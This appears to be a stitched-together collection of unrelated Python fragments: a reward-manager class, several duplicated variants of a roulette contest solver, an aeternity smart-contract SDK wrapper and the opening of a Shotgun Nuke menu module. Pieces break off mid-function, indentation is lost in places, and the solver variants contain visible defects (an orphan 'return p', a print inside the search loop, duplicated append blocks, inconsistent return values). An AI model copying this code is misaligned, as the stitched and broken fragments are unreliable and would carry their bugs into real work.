        self.current_event_idx = 0
        super().__init__()
    def check_episode_end_call(
        self, env, previous_observation, action, observation
    ):
        """Check only the current event, advancing once it is achieved."""
        current = self.events[self.current_event_idx]
        self._reward += current.check(
            env, previous_observation, action, observation
        )
        if current.achieved:
            self.current_event_idx += 1
        return self._check_complete()
    def _check_complete(self) -> bool:
        """Done once the cursor has moved past the final event."""
        return self.current_event_idx == len(self.events)
class GroupedRewardManager(AbstractRewardManager):
"""Operates as a collection of reward managers.
The rewards from each reward manager are summed, and termination can be
specified by ``terminal_sufficient`` and ``terminal_required`` on each
reward manager.
Given this can be nested arbitrarily deeply (as each reward manager could
itself be a GroupedRewardManager), this enables complex specification of
groups of rewards.
"""
    def __init__(self):
        # Child managers polled by check_episode_end_call(); their rewards are
        # summed and their terminal_* flags combined.
        self.reward_managers: List[AbstractRewardManager] = []
def check_episode_end_call(
self, env, previous_observation, action, observation
) -> bool:
for reward_manager in self.reward_managers:
result = reward_manager.check_episode_end_call(
env, previous_observation, action, observation
)
# This reward manager has completed and it's sufficient so we're
# done
if reward_manager.terminal_sufficient and result:
return True
# This reward manager is required and hasn't completed, so we're
# not done
if reward_manager.terminal_required and not result:
return False
# If we've got here we've completed all required reward managers, so
# we're done
return True
def add_reward_manager(
self,
reward_manager: AbstractRewardManager,
terminal_required: bool,
terminal_sufficient: bool,
) -> None:
"""Add a new reward manager, with ``terminal_sufficient`` and
``terminal_required`` acting as for individual events.
Args:
reward_manager (RewardManager):
The reward manager to be added.
terminal_required (bool):
Whether this reward manager terminating is required for the
episode | |
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
return p
def func_dc7bcd5d80cc4af98632f43ef09dcd18(infile):
    """Read roulette test cases from *infile* and print the best expected win.

    Each case gives a budget and the bets already placed on a 37-slot wheel;
    the search enumerates candidate "levelling" heights (``lowest``) to which
    the cheapest slots could be raised. Python 2 code (print statement,
    xrange, floor division on ints). NOTE(review): this is one of several
    auto-extracted near-identical variants of the same solver in this file;
    ``get_expected`` is defined elsewhere.
    """
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate heights: 1, the placed bets, and their neighbors +-1.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Cost to raise every empty slot (and every lower bet) to `lowest`.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            # Number of slots sitting exactly at height `lowest`.
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                # NOTE(review): Py2 `/` floors for int operands -- presumably
                # intended here; verify.
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            # Seed further candidate heights reachable with the leftover money.
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            # Try excluding some already-placed low bets from the levelling.
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
            # NOTE(review): printing inside the while loop emits one line per
            # surviving candidate, not one per case -- looks like mutated
            # generated code; verify against the sibling variants.
            print 'Case #%d: %.10lf' % (cc + 1, ret)
            # NOTE(review): duplicate of the append block above; appears to be
            # leftover duplication from code generation.
            if lowest + can_replicate not in seen:
                seen.add(lowest + can_replicate)
                queue.append(lowest + can_replicate)
    # NOTE(review): returns loop-local state (empty after the last case);
    # sibling variants return different locals -- callers likely ignore it.
    return queue
def func_ab93cf4a44ed406ea499c1ba4c14cd16(infile):
    """Read roulette test cases from *infile* and print the best expected win.

    Near-identical auto-extracted variant of
    ``func_dc7bcd5d80cc4af98632f43ef09dcd18`` differing only in its return
    value. Python 2 code (print statement, xrange, floor division);
    ``get_expected`` is defined elsewhere.
    """
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate heights: 1, the placed bets, and their neighbors +-1.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Cost to raise every empty slot (and every lower bet) to `lowest`.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                # NOTE(review): Py2 integer division floors -- verify intended.
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
            # NOTE(review): printed once per surviving candidate, not per
            # case; plus a duplicated append block below -- generated-code
            # artifacts; verify.
            print 'Case #%d: %.10lf' % (cc + 1, ret)
            if lowest + can_replicate not in seen:
                seen.add(lowest + can_replicate)
                queue.append(lowest + can_replicate)
    # NOTE(review): returns the last case's bets; callers likely ignore it.
    return placed
def func_1d1c96d70cf24a139b15eb47c24fc305(cases, infile):
    """Process *cases* roulette test cases from *infile*, printing each best
    expected win.

    Near-identical auto-extracted variant of
    ``func_dc7bcd5d80cc4af98632f43ef09dcd18`` that takes the case count as a
    parameter and returns the last computed result. Python 2 code (print
    statement, xrange, floor division); ``get_expected`` is defined elsewhere.
    """
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate heights: 1, the placed bets, and their neighbors +-1.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Cost to raise every empty slot (and every lower bet) to `lowest`.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                # NOTE(review): Py2 integer division floors -- verify intended.
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
            # NOTE(review): printed once per surviving candidate, not per
            # case; the append blocks below duplicate the ones above --
            # generated-code artifacts; verify.
            print 'Case #%d: %.10lf' % (cc + 1, ret)
            if lowest + can_replicate not in seen:
                seen.add(lowest + can_replicate)
                queue.append(lowest + can_replicate)
            if lowest + can_replicate - 1 not in seen:
                seen.add(lowest + can_replicate - 1)
                queue.append(lowest + can_replicate - 1)
    # NOTE(review): NameError if cases == 0 (ret never bound); verify callers.
    return ret
def func_aba2540eefae4bc0839f907579e112a2(cases, infile):
    """Process *cases* roulette test cases from *infile*, printing each best
    expected win.

    Near-identical auto-extracted variant of
    ``func_1d1c96d70cf24a139b15eb47c24fc305`` differing only in returning the
    final case index. Python 2 code (print statement, xrange, floor
    division); ``get_expected`` is defined elsewhere.
    """
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate heights: 1, the placed bets, and their neighbors +-1.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Cost to raise every empty slot (and every lower bet) to `lowest`.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                # NOTE(review): Py2 integer division floors -- verify intended.
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
            # NOTE(review): printed once per surviving candidate, not per
            # case; the append blocks below duplicate the ones above --
            # generated-code artifacts; verify.
            print 'Case #%d: %.10lf' % (cc + 1, ret)
            if lowest + can_replicate not in seen:
                seen.add(lowest + can_replicate)
                queue.append(lowest + can_replicate)
            if lowest + can_replicate - 1 not in seen:
                seen.add(lowest + can_replicate - 1)
                queue.append(lowest + can_replicate - 1)
    # NOTE(review): NameError if cases == 0 (cc never bound); verify callers.
    return cc
def func_8a361a215a1b4fa9902633f4f455fb96(cases, infile):
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest | |
<gh_stars>10-100
from aeternity import utils, defaults, identifiers, signing, compiler, hashing
from aeternity.contract import Contract
from munch import Munch
class ContractNative(object):
CONTRACT_ERROR_TYPES = ["revert", "abort", "error"]
def __init__(self, **kwargs):
"""
Initialize a ContractNative object
:param client: an instance of NodeClient
:param source: the source code of the contract
:param compiler: an instance of the CompilerClient
:param address: address of the currently deployed contract (optional)
:param gas: Gas to be used for all contract interactions (optional)
:param fee: fee to be used for all contract interactions (optional)
:param gas_price: Gas price to be used for all contract interactions (optional)
:param account: Account to be used for contract deploy and contract calls (optional)
:param use_dry_run: use dry run for all method calls except for payable and stateful methods (default: True)
"""
if 'client' in kwargs:
self.client = kwargs.get('client')
self.contract = Contract(self.client)
else:
raise ValueError("Node client is not provided")
self.compiler = kwargs.get('compiler', None)
if self.compiler is None:
raise ValueError("Compiler is not provided")
else:
if isinstance(self.compiler, str):
self.compiler = compiler.CompilerClient(self.compiler)
self.source = kwargs.get('source', None)
if self.source is not None:
self.bytecode = self.compiler.compile(self.source).bytecode
self.aci = self.compiler.aci(self.source)
else:
raise ValueError("contract source not provided")
self.contract_name = self.aci.encoded_aci.contract.name
self.gas = kwargs.get('gas', defaults.CONTRACT_GAS)
self.gas_price = kwargs.get('gas_price', defaults.CONTRACT_GAS_PRICE)
self.fee = kwargs.get('fee', defaults.FEE)
self.contract_amount = kwargs.get('amount', defaults.CONTRACT_AMOUNT)
self.use_dry_run = kwargs.get('use_dry_run', True)
address = kwargs.get('address', None)
if address:
self.at(address)
self.account = kwargs.get('account', None)
if self.account and type(self.account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
self.sophia_transformer = SophiaTransformation()
self.__generate_methods()
def __generate_methods(self):
if self.aci:
for f in self.aci.encoded_aci.contract.functions:
self.__add_contract_method(Munch.fromDict({
"name": f.name,
"doc": f"Contract Method {f.name}",
"arguments": f.arguments,
"returns": f.returns,
"stateful": f.stateful,
"payable": f.payable
}))
def __encode_method_args(self, method, *args):
if len(args) != len(method.arguments):
raise ValueError(f"Invalid number of arguments. Expected {len(method.arguments)}, Provided {len(args)}")
transformed_args = []
for i, val in enumerate(args):
transformed_args.append(self.sophia_transformer.convert_to_sophia(val, method.arguments[i].type, self.aci.encoded_aci))
return self.compiler.encode_calldata(self.source, method.name, *transformed_args).calldata
def __decode_method_args(self, method, args):
return self.sophia_transformer.convert_to_py(args, method.returns, self.aci.encoded_aci)
def __add_contract_method(self, method):
def contract_method(*args, **kwargs):
calldata = self.__encode_method_args(method, *args)
use_dry_run = kwargs.get('use_dry_run', self.use_dry_run)
call_info = None
if method.stateful or method.payable or not use_dry_run:
tx_hash = self.call(method.name, calldata, **kwargs).hash
call_info = self.contract.get_call_object(tx_hash)
call_info.tx_hash = tx_hash
else:
call_info = self.call_static(method.name, calldata, **kwargs)
if call_info.result == 'error':
raise ValueError(call_info.reason)
call_info = call_info.call_obj
decoded_call_result = self.compiler.decode_call_result(self.source, method.name, call_info.return_value, call_info.return_type)
if call_info.return_type in self.CONTRACT_ERROR_TYPES:
if isinstance(decoded_call_result, dict):
[(k, v)] = decoded_call_result.items()
else:
(k, v) = decoded_call_result
raise RuntimeError(f"Error occurred while executing the contract method. Error Type: {k}. Error Message: {v[0]}")
return call_info, self.__decode_method_args(method, decoded_call_result)
contract_method.__name__ = method.name
contract_method.__doc__ = method.doc
setattr(self, contract_method.__name__, contract_method)
def __process_options(self, **kwargs):
gas = self.gas if kwargs.get('gas') is None else kwargs.get('gas')
gas_price = self.gas_price if kwargs.get('gas_price') is None else kwargs.get('gas_price')
amount = self.contract_amount if kwargs.get('amount') is None else kwargs.get('amount')
fee = self.fee if kwargs.get('fee') is None else kwargs.get('fee')
account = self.account if kwargs.get('account') is None else kwargs.get('account')
use_dry_run = kwargs.get("use_dry_run", False)
if account is None and use_dry_run is False:
raise ValueError("Please provide an account to sign contract call transactions. You can set a default account using 'set_account' method")
if account and type(account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
return Munch.fromDict({
"gas": gas,
"gas_price": gas_price,
"amount": amount,
"fee": fee,
"account": account
})
def at(self, address):
"""
Set contract address
"""
if not address or not utils.is_valid_hash(address, prefix=identifiers.CONTRACT_ID):
raise ValueError(f"Invalid contract address {address}")
if not self.contract.is_deployed(address):
raise ValueError("Contract not deployed")
self._compare_bytecode(address)
self.address = address
self.deployed = True
def _compare_bytecode(self, address):
onchain_bc = self.client.get_contract_code(pubkey=address).bytecode
self.compiler.validate_bytecode(self.source, onchain_bc)
def set_account(self, account):
if account is None:
raise ValueError("Account can not be of None type")
if type(account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
self.account = account
def deploy(self, *arguments, entrypoint="init",
deposit=defaults.CONTRACT_DEPOSIT,
vm_version=None,
abi_version=None,
tx_ttl=defaults.TX_TTL,
**kwargs):
"""
Create a contract and deploy it to the chain
:return: the transaction
"""
method_list = list(filter(lambda f: f.name == entrypoint, self.aci.encoded_aci.contract.functions))
calldata = None
if len(method_list) == 1 and method_list[0].name == entrypoint:
calldata = self.__encode_method_args(method_list[0], *arguments)
else:
calldata = self.compiler.encode_calldata(self.source, entrypoint, *arguments).calldata
opts = self.__process_options(**kwargs)
tx = self.contract.create(opts.account, self.bytecode, calldata, opts.amount, deposit, opts.gas,
opts.gas_price, opts.fee, vm_version, abi_version, tx_ttl)
self.at(tx.metadata.contract_id)
return tx
def call(self, function, calldata,
         abi_version=None,
         tx_ttl=defaults.TX_TTL,
         **kwargs):
    """Execute a contract entrypoint on chain.

    :param function: the name of the entrypoint to invoke
    :param calldata: the encoded calldata for the invocation
    :param abi_version: the ABI version, or None for the node default
    :param tx_ttl: the transaction time-to-live
    :param kwargs: tx options (gas, gas_price, amount, fee, account)
    :return: the call transaction
    """
    opts = self.__process_options(**kwargs)
    return self.contract.call(
        self.address, opts.account, function, calldata, opts.amount,
        opts.gas, opts.gas_price, opts.fee, abi_version, tx_ttl,
    )
def call_static(self, function, calldata,
                abi_version=None,
                tx_ttl=defaults.TX_TTL,
                top=None,
                **kwargs):
    """
    call-static a contract method

    Executes the call as a dry-run: nothing is mined and no fee is spent.

    :param function: the name of the entrypoint to invoke
    :param calldata: the encoded calldata for the invocation
    :param abi_version: the ABI version, or None for the node default
    :param tx_ttl: the transaction time-to-live
    :param top: block to execute the dry-run at, or None for the chain top
    :return: the call object
    """
    # Force the dry-run flag so option processing does not require an account.
    kwargs["use_dry_run"] = True
    opts = self.__process_options(**kwargs)
    # Without an account the dry-run executes with no caller address/amount.
    if opts.get('account') is None:
        return self.contract.call_static(self.address, function, calldata, gas=opts.gas,
                                         gas_price=opts.gas_price, fee=opts.fee, abi_version=abi_version,
                                         tx_ttl=tx_ttl, top=top)
    return self.contract.call_static(self.address, function, calldata, address=opts.account.get_address(), amount=opts.amount,
                                     gas=opts.gas, gas_price=opts.gas_price, fee=opts.fee, abi_version=abi_version,
                                     tx_ttl=tx_ttl, top=top)
class SophiaTransformation:
    """Two-way conversion between Python values and Sophia source literals.

    Conversion is dispatched via getattr() to per-type methods named
    `to_sophia_<base_type>` / `from_sophia_<base_type>`, where the base type
    is extracted from the contract's ACI.
    """
    # Prefixes used to locate the per-type conversion methods via getattr().
    TO_SOPHIA_METHOD_PREFIX = 'to_sophia_'
    FROM_SOPHIA_METHOD_PREFIX = 'from_sophia_'
def __inject_vars(self, t, aci_types):
    """Substitute generic type variables in a variant typedef.

    :param t: the concrete type instance, e.g. ``{"Type.name": [<args>]}``
    :param aci_types: the matching typedef entry from the ACI
    :returns: the typedef with declared type variables replaced by the
        concrete arguments, or None when the base type is not a variant.
    """
    # NOTE(review): both unpackings require exactly one key/value pair —
    # confirm callers always pass single-entry mappings here.
    [[base_type, generic]] = aci_types.items()
    [[_, variant_value]] = t.items()
    if base_type == 'variant':
        vars_map = []
        for x in generic:
            # Fix: dict views are not subscriptable on Python 3
            # (`x.items()[0]` raised TypeError); materialize first.
            tag, gen = list(x.items())[0]
            gen_map = []
            # Loop-invariant: the declared type-variable names.
            var_name_list = [e.name for e in aci_types['vars']]
            for y in gen:
                if y in var_name_list:
                    gen_map.append(variant_value[var_name_list.index(y)])
                else:
                    gen_map.append(y)
            # Fix: the previous `{[tag]: gen_map}` / `{[base_type]: vars_map}`
            # forms raised TypeError (a list is not a hashable dict key) —
            # JS computed-key syntax carried over by mistake.
            vars_map.append({tag: gen_map})
        return {base_type: vars_map}
def __link_type_def(self, t, bindings):
    """Resolve a contract-scoped type name against the ACI type definitions.

    :param t: a type reference, either "Contract.name" or {"Contract.name": [...]}
    :param bindings: ACI bindings exposing `contract.type_defs` and `contract.state`
    :returns: the resolved typedef
    """
    # Only the part after the dot is the type name; assumes exactly one dot.
    _, type_defs = t.split('.') if isinstance(t, str) else list(t.keys())[0].split('.')
    # The implicit `state` type is made searchable like any declared typedef.
    aci_types = bindings.contract.type_defs + [Munch.fromDict({"name": "state", "typedef": bindings.contract.state, "vars": []})]
    aci_types = filter(lambda x: x.name == type_defs, aci_types)
    # NOTE(review): raises IndexError when the name is not found — confirm
    # unknown type names cannot reach this point.
    aci_types = list(aci_types)[0]
    if len(list(aci_types.vars)) > 0:
        # Generic typedef: substitute its vars (mutates the cached entry).
        aci_types.typedef = self.__inject_vars(t, aci_types)
    return aci_types.typedef
def __extract_type(self, sophia_type, bindings={}):
    """Reduce an ACI type entry to a ``(base_type, generic)`` pair.

    :param sophia_type: the ACI type entry (str, dict, or one-element list)
    :param bindings: optional ACI bindings used to resolve contract-scoped
        custom type names
    :returns: (base_type, generic_args) — generic_args is None for base types.
        Falls through returning None for unsupported shapes; callers that
        unpack two values will then raise.
    """
    [t] = [sophia_type] if not isinstance(sophia_type, list) else sophia_type
    # Resolve custom types declared by the contract itself.
    if len(bindings) > 0:
        if isinstance(t, str):
            # Fix of an untangled condition that compared a bool with
            # `> 0` (`isinstance(t, dict) > 0`) — a translation artifact.
            is_custom = bindings.contract.name in t
        elif isinstance(t, dict):
            is_custom = bindings.contract.name in list(t.keys())[0]
        else:
            is_custom = False
        if is_custom:
            t = self.__link_type_def(t, bindings)
    # map, tuple, list, record, bytes
    if isinstance(t, dict):
        [(key, val)] = t.items()
        return key, val
    # base types
    if isinstance(t, str):
        return t, None
def convert_to_sophia(self, argument, sophia_type, bindings={}):
    """Render `argument` as Sophia source text for the given ACI type."""
    base_type, generic = self.__extract_type(sophia_type, bindings)
    handler = getattr(self, self.TO_SOPHIA_METHOD_PREFIX + base_type, None)
    if handler is None:
        # No dedicated serializer: fall back to plain interpolation.
        return f'{argument}'
    return handler(argument, generic, bindings)
def convert_to_py(self, argument, sophia_type, bindings={}):
    """Decode a Sophia value into its Python counterpart."""
    base_type, generic = self.__extract_type(sophia_type, bindings)
    handler = getattr(self, self.FROM_SOPHIA_METHOD_PREFIX + base_type, None)
    # Unhandled base types pass through unchanged.
    return argument if handler is None else handler(argument, generic, bindings)
def to_sophia_string(self, arg, generic, bindings={}):
    """Quote `arg` as a Sophia string literal."""
    return '"{}"'.format(arg)
def to_sophia_signature(self, arg, generic, bindings={}):
    """Serialize a signature — identical wire format to bytes.

    Fix: forwards the caller's `bindings` instead of always passing ``{}``.
    """
    return self.to_sophia_bytes(arg, generic, bindings=bindings)
def from_sophia_signature(self, arg, generic, bindings={}):
    """Decode a signature — identical wire format to bytes."""
    return self.from_sophia_bytes(arg, generic, bindings=bindings)
def to_sophia_hash(self, arg, generic, bindings={}):
    """Serialize a hash — identical wire format to bytes."""
    return self.to_sophia_bytes(arg, generic, bindings=bindings)
def from_sophia_hash(self, arg, generic, bindings={}):
    """Decode a hash — identical wire format to bytes."""
    return self.from_sophia_bytes(arg, generic, bindings=bindings)
def to_sophia_bytes(self, arg, generic, bindings={}):
    """Render bytes-like values as a Sophia ``#hex`` literal."""
    if isinstance(arg, bytes):
        return f"#{arg.hex()}"
    if isinstance(arg, str):
        # api-encoded hashes are decoded to raw hex first; anything else is
        # assumed to already be hex text.
        hex_val = hashing.decode(arg).hex() if utils.is_valid_hash(arg) else arg
        return f'#{hex_val}'
    # NOTE(review): any other type silently yields None — confirm callers
    # never pass anything but str/bytes.
def from_sophia_bytes(self, arg, generic, bindings={}):
    """Strip the leading ``#`` from a Sophia bytes literal, returning hex text."""
    parts = arg.split('#')
    # parts[0] is whatever precedes '#' (normally empty), parts[1] the payload.
    return parts[1]
def to_sophia_bool(self, arg, generic, bindings={}):
    """Render a Python truth value as Sophia ``true``/``false``."""
    if arg:
        return "true"
    return "false"
def to_sophia_map(self, arg, generic, bindings={}):
    """Render a mapping as a Sophia map literal ``{[k] = v, ...}``.

    Accepts either a dict or an iterable of (key, value) pairs;
    generic[0]/generic[1] carry the key and value ACI types.
    """
    pairs = arg.items() if isinstance(arg, dict) else arg
    rendered = [
        f"[{self.convert_to_sophia(k, generic[0], bindings)}] = {self.convert_to_sophia(v, generic[1], bindings)}"
        for k, v in pairs
    ]
    return "{" + ",".join(rendered) + "}"
def from_sophia_map(self, arg, generic, bindings={}):
    """Decode a Sophia map (iterable of [key, value] pairs) into a dict."""
    key_t, value_t = generic
    return {
        self.convert_to_py(k, key_t, bindings): self.convert_to_py(v, value_t, bindings)
        for k, v in arg
    }
def to_sophia_list(self, arg, generic, bindings={}):
    """Render an iterable as a Sophia list literal ``[a,b,...]``.

    Fix: the previous slice-based string build (``result[:-1] + "]"``)
    returned ``"]"`` for an empty input; join() yields ``"[]"`` correctly.
    """
    return "[" + ",".join(self.convert_to_sophia(v, generic, bindings) for v in arg) + "]"
def from_sophia_list(self, arg, generic, bindings={}):
    """Decode each element of a Sophia list into Python."""
    return [self.convert_to_py(item, generic, bindings) for item in arg]
def to_sophia_option(self, arg, generic, bindings={}):
    """Render None as Sophia ``None``, anything else as ``Some(<value>)``."""
    if arg is None:
        return 'None'
    return f"Some({self.convert_to_sophia(arg, generic, bindings)})"
def from_sophia_option(self, arg, generic, bindings={}):
    """Decode a Sophia option: ``'None'``/``{'Some': [x]}`` -> None/x."""
    if arg == 'None':
        return None
    # Expect a single-entry variant dict carrying a one-element payload.
    [(variant_tag, [value])] = arg.items()
    if variant_tag != 'Some':
        return None
    return self.convert_to_py(value, generic, bindings)
def to_sophia_tuple(self, arg, generic, bindings={}):
    """Render a sequence as a Sophia tuple literal ``(a,b,...)``.

    Each element is converted with its positional type ``generic[i]``.
    Fix: the previous slice-based string build returned ``")"`` for an
    empty tuple; join() yields ``"()"`` correctly.
    """
    items = ",".join(
        self.convert_to_sophia(val, generic[i], bindings)
        for i, val in enumerate(arg)
    )
    return "(" + items + ")"
def to_sophia_record(self, arg, generic, bindings={}):
    """Render a dict as a Sophia record literal using the ACI field list.

    `generic` is the ordered list of field descriptors ({'name', 'type'});
    each field's value is looked up in `arg` by name.
    """
    fields = []
    for field in generic:
        name = field['name']
        fields.append(f"{name} = {self.convert_to_sophia(arg[name], field['type'], bindings)}")
    return "{" + ",".join(fields) + "}"
def from_sophia_record(self, arg, generic, bindings={}):
result = {}
generic_map = {}
for val in generic:
generic_map[val['name']] = {'type': val['type']}
for [name, | |
<gh_stars>1-10
# Copyright (c) 2016 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""Menu handling for Nuke and Hiero."""
import tank
import sys
import nuke
import os
import unicodedata
import nukescripts.openurl
import nukescripts
# -----------------------------------------------------------------------------
class BaseMenuGenerator(object):
    """
    The base class for Nuke based menu generators.
    """

    def __init__(self, engine, menu_name):
        """
        Initializes a new menu generator.

        :param engine: The currently-running engine.
        :type engine: :class:`tank.platform.Engine`
        :param menu_name: The name of the menu to be created.
        """
        self._engine = engine
        self._menu_name = menu_name
        # Deriving classes populate this with their menu object. It is
        # initialized here so _disable_menu() can safely test it even when
        # no menu was ever created (previously an AttributeError).
        self._menu_handle = None
        engine_root_dir = self.engine.disk_location
        self._shotgun_logo = os.path.abspath(
            os.path.join(
                engine_root_dir,
                "resources",
                "sg_logo_80px.png",
            ),
        )
        self._shotgun_logo_blue = os.path.abspath(
            os.path.join(
                engine_root_dir,
                "resources",
                "sg_logo_blue_32px.png",
            ),
        )

    @property
    def engine(self):
        """
        The currently-running engine.
        """
        return self._engine

    @property
    def menu_name(self):
        """
        The name of the menu to be generated.
        """
        return self._menu_name

    def create_sgtk_error_menu(self):
        """
        Creates an "error" menu item from the currently-handled exception.
        """
        # Fix: 'traceback' was referenced below without ever being imported
        # in this module, which raised NameError exactly when an engine
        # startup error needed to be reported.
        import traceback
        (exc_type, exc_value, exc_traceback) = sys.exc_info()
        msg = ("Message: Shotgun encountered a problem starting the Engine.\n"
               "Exception: %s - %s\n"
               "Traceback (most recent call last): %s" % (exc_type,
                                                          exc_value,
                                                          "\n".join(traceback.format_tb(exc_traceback))))
        self._disable_menu("[Toolkit Error - Click for details]", msg)

    def create_sgtk_disabled_menu(self, details=""):
        """
        Creates a "disabled" Shotgun menu item.

        :param details: A detailed message about why Toolkit has been
                        disabled.
        """
